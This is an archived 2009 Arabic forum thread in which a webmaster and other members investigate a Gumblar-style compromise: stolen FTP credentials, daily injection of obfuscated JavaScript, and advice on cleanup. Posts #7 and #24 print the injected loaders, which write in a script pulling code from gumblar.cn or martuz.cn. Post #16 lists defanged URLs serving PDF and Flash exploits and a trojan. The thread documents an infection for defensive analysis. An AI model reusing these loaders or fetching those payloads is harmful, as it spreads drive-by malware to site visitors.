الفريق العربي للبرمجةأرشيف المنتديات · 2000 – 2023
نسخة أرشيفية للقراءة فقط — التسجيل والمشاركة مغلقان، والمحتوى محفوظ كما كان.

اختراق غريب ... برنامج ما يقوم بسرقة كلمة المرور لل Ftp

بدأه web2009 في 14 مايو 2009 · 23 رد · 5,161 مشاهدة · في قسم أمن المعلومات العام
مشاركة: واتساب X فيسبوك تيليجرام
#1 صاحب الموضوع

السلام عليكم

لقد تعرض موقعي للقرصنة، حيث تم إدخال كود

php

غريب اليه .

ادخال الكود الى الموقع لم يكن عن طريق ثغرة فيه بل تم عن طريق سرقة كلمة المرور الخاصة بالـ

ftp

و أعتقد أن أحد البرامج التي أستعملها كان مسؤول عن هذه السرقة .

أعطيكم معلومات أكثر عن هذا الاختراق و أترك لكم تحليلها :

- يتم دخول شخص ما الى الموقع في أول كل صباح ما بين الـواحد و الثالثة صباحا كل يوم، يقوم بتحميل الملفات و إعادتها (بعد اضافة الكود الغريب اليها) عناوين الايبي الخاصة بالمخترق هي :

66.113.131.76

62.193.234.61

74.205.126.211

206.71.149.50

71.6.165.225

195.56.77.46

62.151.177.42

84.51.21.55

76.76.21.98

رغم تغييري لكلمة المرور إلا أن الدخول استمر بشكل يومي و بنفس الطريقة الى مواقعي

- تم وضع الكود الغريب كذلك في موقعي الشخصي و الذي لا يقرأ الملفات من نوع

PHP

و هذا أكبر دليل على أن الامر لا يتعلق بإختراق إنما هو مجرد سرقة لكلمة السر و الدخول عن طريق الـ.

ftp

اتمنى ان تواصلوا البحث و التحري لكي نعرف المزيد عن هذا النوع الجديد من القرصة و انا مستعد للاجابة عن استفساراتكم .. .

تم تعديل هذه المشاركة بواسطة web2009 في 14 مايو 2009 في 01:44

#2

أثناء بحثي وجدت هذا الموضوع

http://blog.scansafe.com/

الان بدأت تتضح لي الرؤية أكثر . انتظر اجاباتكم بفارغ الصبر

#3

الامر يتعلق بـ troyen / keylogger قام بسرقة جميع كلمات المرور الخاصة بي !!!! المرجو المساعدة يا خبراء لكي احذف هذا البرنامج المتجسس من جهازي

#4

في هذه اللحظة قام هذا البرنامج المتسلل بالدخول مجددا الى الـ ftp عن طريق عنوان الايبي التالي

65.182.104.95

لكنني اوقفته فلقد حرمني هذا المتسلل من النوم فالويل لك يا gumbler :angry:

#5

السلام عليكم و رحمة الله تعالى و بركاته

أولا:

قم بالدخول من جهاز آمن و غير مصاب بالعدوى (استعمل جهاز جديد - اعادة تهيأة القرص بمسحه كليا و تثبيت نظام تشغيل من جديد)

بعدها قم بالدخول لحسابك FTP و غير كلمة المرور بأخرى أشد و أقصى... بعدها أخبرنا

ثانيا:

إذا لم يكن لديك مانع أن توافينا بالمعلومات التقنية، أقصد كود الحقن، نظام التشغيل المستعمَل + برنامج FTP، و موقع السرفر، أوقات الاختراق (أظن أن العملية أتوماتيكية، و الهدف من طلبي هوإذا كانت قائمة مواقع كم يحتاج ليقوم بدورة حتى يعود لموقعك)

و لا داعي لمشاركتنا بها إذا لم ترتاح لتقديمها

:)

تم تعديل هذه المشاركة بواسطة merouane في 14 مايو 2009 في 11:11

#6

السلام عليكم.

كنت قد حملت Keylogger من قبل لكن حذفته بالخطأ،لذلك ضع لنا الكود الضار والذي يتم وضعه في موقعك وبعدها سنستخرج Keylogger او Trojan ونعينك على حذفه من جهازك.

ولاتنسى أن ترفق لنا موقعك لكي نحاول التفاعل مع الأكواد بشكل أفضل.

تم تعديل هذه المشاركة بواسطة DATA_SNIPER في 14 مايو 2009 في 13:31

infected.png

مدونة علوم الحاسب

#7

شكرا لك يا merouane على الاجابة

كود الحقن يختلف من يوم لاخر و اخر كود تم حقن الموقع به هو

<script language=javascript><!-- 
  (function(){var WA15='%';var Pia7=('var~20a~3d~22Scri~70t~45~6egine~22~2cb~3d~22Ver~73~69on(~29+~22~2cj~3d~22~22
  ~2cu~3dn~61vigat~6fr~2eu~73~65~72Ag~65nt~3bi~66(~28~75~2eindex~4f~66(~22Win~22~29
  ~3e0)~26~26(u~2e~69~6e~64exOf(~22NT~20~36~22)~3c0~29~26~26(documen~74~2ec~6fokie~
  2einde~78~4f~66~28~22miek~3d1~22)~3c0~29~26~26~28ty~70eof(zr~76z~74s)~21~3dt~79~7
  0eof(~22A~22))~29~7bzrvz~74s~3d~22A~22~3be~76al~28~22~69f~28~77~69ndow~2e~22+a+~2
  2)j~3d~6a+~22+a+~22Maj~6fr~22~2b~62+a~2b~22Minor~22+b+a~2b~22~42u~69ld~22+b+~2
  2j~3b~22~29~3b~64oc~75~6de~6et~2e~77rite~28~22~3cscript~20sr~63~3d~2f~2fgum
blar~
  2ecn~2fr~73s~2f~3fid~3d~22+j~2b~22~3e~3c~5c~2fscript~3e~22)~3b~7d').replace(/~/g,WA15);eval(unescape(Pia7))})();
   --></script>

هذا هو الكود الاصلي

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");}

نظام التشغيل المستعمل هو windows xp

برنامج ال ftp هو اخر نسخة لـ filezilla

موقع السيرفر هو ovh

الدخول يتم كل يوم ما بين الواحدة و الثالثة صباحا و يستمر ما بين ساعة و ساعة و نصف حتى يكمل قراءة كل محتوى الموقع بدون استثناء (يدخل حتى للملف cgi-bin و الذي لا استعمله اصلا)

لسوء الحظ قام "غوغل" بحذف جميع روابط مواقعي من فهرسته بدعوى انني اقوم بتلغيم موقعي و اهدد سلامة الزوار... و بالتالي خسرت الاف الزوار يوميا و اعتقد بان العقوبة ستدون لاكثر من 90 يوم و هذه خسارة عضمى.

خلاصة القول ان هذا المتسلل حقق هدفه و هو ازالة موقعي من غوغل بعدما كان يحتل المرتبة الاولى بعدة كلمات ذات استعمال مكثف .

ليس هذا فحسب انما قام بوضع مجموعة من الروابط الوهمية. مثلا الصفحة http://www.xxx.xx/index.php تضاعفت في المحرك و اصبحت على شكل http://www.xxx.xx/index.php?xx

http://www.xxx.xx/index.php?xx/xx

http://www.xxx.xx/index.php?xx/xx/xx

http://www.xxx.xx/index.php?xx/xx/xx/xx

http://www.xxx.xx/index.php?xx/xx/xx/xx/xx

http://www.xxx.xx/index.php?xx/xx/xx/xx/xx/xx

وهذا بحد ذاته اختراق لاتفاقية الجودة في محرك البحث مما يرشح مدة العقوبة للارتفاع

كل هذا ليس الا غيض من فيض و ما اكتشفته ليس الا جزء لا يتجزأ مما يمكن ان يكون قد قام به هذا المتسلل.

تم تعديل هذه المشاركة بواسطة web2009 في 14 مايو 2009 في 13:53

#8

http://perso.wana.ma/salhi/test/

يمكنكم معاينة الكود الغريب بين

</head>

و

</body>

#9

الكود المحقون من gumblar.cn يكون نفسه بعد فك التشفير، والهدف كما اتضح في النهاية هو استغلال ثغرة PDF في أمور أفظع.

الهدف الآن معرفة طريقة الانتشار فالوقاية خير من قنطار علاج.

هل يعقل أن يكون الموضوع متعلق بـ trojan تم نشره في البداية يقوم بسرقة كلمات السر للمواقع والسيرفرات ثم تبدأ المرحلة الثانية في حقن هذه المواقع؟ بصراحة أستبعد هذا الاحتمال لأنه سيبطئ الانتشار بشكل كبير ويعرض الأمر للاكتشاف بسرعة أكبر.

هل يعقل أن يكون برنامج FileZilla - أن تكون نسخة مصابة أو تم الوصول إلى النسخة الأصلية بصورة ما وحقنها؟ أيضاً احتمال بعيد

الملاحظ أن هذا النوع من الاختراق بدأ الآن يظهر على نطاق أوسع كلما توغلنا أكثر في المواقع.

هل يعقل أن تكون المشكلة ثغرة غير مكتشفة حتى الآن يتم استغلالها؟ وارد - لكن كيف يمكن تضييق الاحتمالات والوقوف على نتيجة بدون جمع أكبر كمية من المعلومات من أصحاب المواقع المصابة

Do as I say, not as I do

We are Anonymous. We are Legion. We don't forgive. We don't forget

#10

بعد مراجعة ملف log الذي يسجل كل ما يتعلق بالموقع استنتجت ان ادخال الكود لاول مرة تم يوم 28 ابريل حوالي الثانية صباحا

في يوم 27 ابريل اي قبل عملية التسلل عن طريق ال ftp قام robot باضافة موضوع يضم "سكريبت" الى موقعي و بالتالي كنت انا اول من تعرض للاصابة ببرنامج التسلل هذا رغم حذفي للموضوع لانه كان عبارة عن ما يسمى spam يحتوي على عدد كبير من الروابط

مما سهل عملية الاختراق هو استعمالي لـ"سكريبت" htmlarea و الذي يمكن من اضافة الصور و التحكم في الخط ...

بعد تحديث برنامج adobe reader اصبح هذا الاخير يعطي تحدير بانه لم يتمكن من قراءة المرفقات (لا اتذكر الاسم بالتحديد لكن على شكل xxxx.tmp ) و هذا يعني بان الشركة تعرفت على هذا الفيروس و قامت باللازم لتوقيف نشاطه.

لا اعتقد ان لـ filezilla علاقة بهذا التسلل لانني قمت بتغيير كلمة المرور عن طريق لوحة التحكم باستعمال mozilla و لم افتح الـftp طوال اليوم الا انني سجلت دخول المتسلل من جديد.

عندما اضغط على démarrer/Exécuter و اكتب cmd يتم غلق متصفح iexplorer.exe و Explorer.exe ثم يتم اعادة فتح Explorer.exe تلقائيا.

من حين لاخر يتم غلق المتصفح mozilla تلقائيا و تظهر لي رسالة بانه يتوجب علي ارسال تقرير عن هذا الخلل الى الشركة

هذه المشكلة الاخيرة ظهرت في الجهازين اللذان لم يتمكنا من التعرف عن الفيروس (احدهما كنت قد اعدت مسحه مؤخرا و لم اقم بوضع avast و الاخر لم اقم بتحديث برنامج الحماية منذ مدة ) اما الجهاز الذي تعرف على الفيروس و قام بخذفه فهو امن باستعمال اخر نسخة لـ avast .

اتمنى ان تفيدكم هذه المعطيات في البحث

تم تعديل هذه المشاركة بواسطة web2009 في 14 مايو 2009 في 14:52

#11
Xacker كتب:
الهدف الآن معرفة طريقة الانتشار فالوقاية خير من قنطار علاج.

اغلب حالات الإصابة (إن لم تكن كلها) حدثت بعد دخول مدراء هذه المواقع إليها عن طريق FTP و أحيانا أخرى لضعف حماية المجلدات و الملفات من الكتابة (chmod)

Xacker كتب:
هل يعقل أن يكون الموضوع متعلق بـ trojan تم نشره في البداية يقوم بسرقة كلمات السر للمواقع والسيرفرات ثم تبدأ المرحلة الثانية في حقن هذه المواقع؟ بصراحة أستبعد هذا الاحتمال لأنه سيبطئ الانتشار بشكل كبير ويعرض الأمر للاكتشاف بسرعة أكبر.

هل يعقل أن يكون برنامج FileZilla - أن تكون نسخة مصابة أو تم الوصول إلى النسخة الأصلية بصورة ما وحقنها؟ أيضاً احتمال بعيد

الملاحظ أن هذا النوع من الاختراق بدأ الآن يظهر على نطاق أوسع كلما توغلنا أكثر في المواقع.

هذه المعلومات لمحاولة معرفة الفئة المعرضة أكثر للإصابة و ليس تشكيكا فيها

مع احتمال أن تكون ثغرة في هذه البرامج و لم ينشر محتواها بعد

Xacker كتب:
هل يعقل أن تكون المشكلة ثغرة غير مكتشفة حتى الآن يتم استغلالها؟ وارد - لكن كيف يمكن تضييق الاحتمالات والوقوف على نتيجة بدون جمع أكبر كمية من المعلومات من أصحاب المواقع المصابة

إذا لم يرد أصحاب المواقع مشاركة هذه المعلومات فهم أحرار .. لكننا لا نستطيع الوقوف على الحل (الوقاية) دون الإحاطة بهذه المعلومات

أو نقوم بنصب فخ بتعريض موقع وهمي للإصابة حتى نحصل على الكود الخبيث

في الأخير طلبي لا يوجد منه أي شيئ مضر - مع أن المعلومات المطلوبة كانت عامة و ليست خاصة قد تعرف على امور قد تضر المعني

:)

#12

عفواً أخ مروان ما كتبته لم يكن تعليق على طلباتك من الأخ :)

مجرد أفكار أضعها على الورق

Do as I say, not as I do

We are Anonymous. We are Legion. We don't forgive. We don't forget

#13

اعتقد انني اعطيتكم كل المعلومات التي طلبتموها يا اخوتي فهذا الامر لا يضر بخصوصيتي كما يقول المثل المغربي "لي تشطح ما تدرك وجها" و معناه ان التي ترقص ليست في حاحة الى اخفاء وجهها فلقد كشفت عن اعضاء اهم بكثير من الوجه :happy:

شكرا لكم جميعا

#14
Xacker كتب:
عفواً أخ مروان ما كتبته لم يكن تعليق على طلباتك من الأخ :)

مجرد أفكار أضعها على الورق

لا توجد مشكلة يا أخي Xacker

ردي كان فقط حتى لا يظن بي الظنون :P

-------------------------------------------------------------------------------

@ web2009

اتمنى أن تحل مشكلتك

و لا تنسى تنظيف حاسبك باستعمال avast

:)

#15

السلام عليكم.

لقد قمت بتحميل trojan وجميع ملحقاته وتم إرسالها للتحليل،ويعدها ننظر في الأمر.

وظهر أن التروجان يعتمد على ثغرة في ملفات PDF كما تم توضيحهه بالإَافة إلى إتعمال و إستغلال ثغرة في SWF Files

وهذه هي الملحقات

swf & PDF Exploit

J1k.EXE ==>trojan

ولي عودة بإذن الله.

Malware.rar

infected.png

مدونة علوم الحاسب

#16

دائما هذا اللعين gumblar .

نعم لحظت ان هذا ال gumblar يستعمل ملفين SWF وملف ال PDF الذي تحدثت عنه . وللحصول عليهم : :

طبعا في ال VM

hxxp://94.247.2.195/news/?id=3 // ملفات ال SWF

و هذا :

hxxp://94.247.2.195/news/?id=2 // ملف ال PDF الذي تكلمنا عنه سابقا

قمت بال Decompilation لملفين ال SWF النتيجة الاولية انه يستعمل طريقة ال loadBytes لل sprite loader وهذا لتحميل وتشغيل malicious code في في مشغل الفلاش او ال Flash player .

وهذ ما اشك فيه و هو حتى في موقع ال QuaranFlash ال Flash Player يحقن و يلغم بهذا اللعين gumblar

إظافات :

hxxp://94.247.2.195/news/index.php -------- > exploits

hxxp://94.247.2.195/news/?id=2 --------- > pdf exploit // ملف ال PDF الذي تكلمنا عنه سابقا

hxxp://94.247.2.195/news/?id=3 ----------> flash exploit // ملفات ال SWF

hxxp://94.247.2.195/news/?id=10& ----------> trojan

التحليل متواصل .

تم تعديل هذه المشاركة بواسطة mohfa في 15 مايو 2009 في 00:03

عزيزي :

لاتنسى ان تصلي على حبيبنا و شفيعنا يوم لا ينفع مال ولا بنون .

فاللهمّ صّل وسّلم على سيدي و شفيعي وحبيبي محمد عليك الف صلاة وازكى تسليم

*****

2_header.png

#18

شكرا لك على المجهود ، ننتظر معلومات أكثر دقة و وضوح ، و السلام عليكم و رحمة الله

#19

السلام عليكم

تحياتي لجميع أعضاء وزوار هذا المنتدى الرائع، بالنسبة لمشكلتي فلقد حلت ، بحيث قمت بتحديث برنامج الحماية avast و غيرت مباشرة بعد ذلك كلمة المرور. فكانت النتيجة هي أن المتسلل لم يتمكن من الدخول

vsftpd: Sat May 16 11:20:37 2009 [pid 20157] [] FTP response: Client "74.50.94.202", "331 Please specify the password."
vsftpd: Sat May 16 11:20:37 2009 [pid 20157] [] FTP command: Client "74.50.94.202", "PASS <password>"
vsftpd: Sat May 16 11:20:39 2009 [pid 20144] [] FAIL LOGIN: Client "74.50.94.202"
vsftpd: Sat May 16 11:20:40 2009 [pid 20157] [] FTP response: Client "74.50.94.202", "530 Login incorrect."
vsftpd: Sat May 16 11:36:21 2009 [pid 18506] [] FTP response: Client "67.19.226.66", "331 Please specify the password."
vsftpd: Sat May 16 11:36:21 2009 [pid 18506] [] FTP command: Client "67.19.226.66", "PASS <password>"
vsftpd: Sat May 16 11:36:23 2009 [pid 18498] [] FAIL LOGIN: Client "67.19.226.66"
vsftpd: Sat May 16 11:36:24 2009 [pid 18506] [] FTP response: Client "67.19.226.66", "530 Login incorrect."

فالحمد لله و شكرا لكم جميعا فعلى الاقل وجدت فيكم المستمع الجيد الذي لم يتردد في المساعدة ، تقبلوني عضوا جديدا بينكم و السلام عليكم و رحمة الله

تم تعديل هذه المشاركة بواسطة web2009 في 16 مايو 2009 في 13:36

#20

الحمد لله لاتنسى ان تنظف جهازك

والله المستعان

عزيزي :

لاتنسى ان تصلي على حبيبنا و شفيعنا يوم لا ينفع مال ولا بنون .

فاللهمّ صّل وسّلم على سيدي و شفيعي وحبيبي محمد عليك الف صلاة وازكى تسليم

*****

2_header.png

#21

جيد،حاول ان لا تقع في نفس المشكلة رة أخرى ،وأنصحك بتثبي الكاسبر لأنه يحتوي على خاصية كشف Keylogger وغيرها من malware ، بالإضافة إلى قاعدة بياناته الضخمة.

infected.png

مدونة علوم الحاسب

#22

شكرا لكم إخواني ، مهما فعل الانسان فالخطأ وارد و ها أنا اليوم اقع من جديد في الخطأ ، قد يرجع ذلك الى عدم فهمي الكامل لطريقة انتشار هذا النوع من الفيروسات ، إذا فأنا أعتبر لحد الساعة كفأر تجربة و ما يسعني إلا أن أطلب اللطف من الله

#23

هل انتشر مرة أخرى؟

بماذا أخطأت حتى حدث هذا؟

Do as I say, not as I do

We are Anonymous. We are Legion. We don't forgive. We don't forget

#24

قمت بالدخول عن طريق filezilla (البرنامج الذي استعمله لنقل الملفات )

و مباشرة دخلت لاتصف الموقع ، فوجدت كود جديد محقون ، قمت بعدها بالتأكد من الاشخاص الذين قاموا بالدخول، فوجدت رقم ip مشبوه وهو

66.7.208.222.

و انا الان اغلقت الموقع مؤقتا حتى اتمكن من اصلاحه مجددا ...

لاحظ معي العود الجديد:

<script language=javascript><!-- 
(function(sSVHk){var L1Wa='%';eval(unescape(('v`61r`20a`3d`22`53`63riptEngine`22`2c`62`3d`22`56ersion()+`22`2cj`3d`22`22`2c`75`3dnavigato`72`2e
userAg`65n`74`3b`69`66`28`28u`2eindexOf(`22Chro`6d`65`22)`3c0`29`26`26`28u`2ein`64`65x`4ff`28`22`57i`6e`22)`3e0`29`26`26`28`75`2ei`6e
dexOf(`22NT`206`22)`3c0`29`26`26`28docume`6et`2ecookie`2eindexO`66`28`22miek`3d1`22`29`3c`30)`26`26(t`79peo`66(zr`76zts`29`21`3d
typeof`28`22`41`22`29))`7bzr`76zts`3d`22`41`22`3beval(`22`69`66(`77indow`2e`22+`61+`22)j`3dj`2b`22+a`2b`22`4dajor`22+b+`61+`22`4din`6fr`22+
b`2ba+`22`42u`69`6cd`22+`62+`22j`3b`22)`3bdo`63um`65nt`2ewr`69te(`22`3cscript`20s`72`63`3d`2f`2fm`61`22+`22r`74uz`2ecn`2f`76id`2f`3fid`3d`22+j
+`22`3e`3c`5c`2fscr`69`70t`3e`22)`3b`7d').replace(sSVHk,L1Wa)))})(/\`/g);
 --></script>

تم تعديل هذه المشاركة بواسطة Xacker في 17 مايو 2009 في 17:35 — السبب: لا داع لاستخدام [right]

مواضيع مشابهة

عدد الزوار حالياً

المتواجدون خلال آخر دقيقتين · يتحدّث كل ٣٠ ثانية

—الإجمالي—أعضاء مسجّلون—زوار بدون تسجيل

جارٍ التحقق من المتواجدين…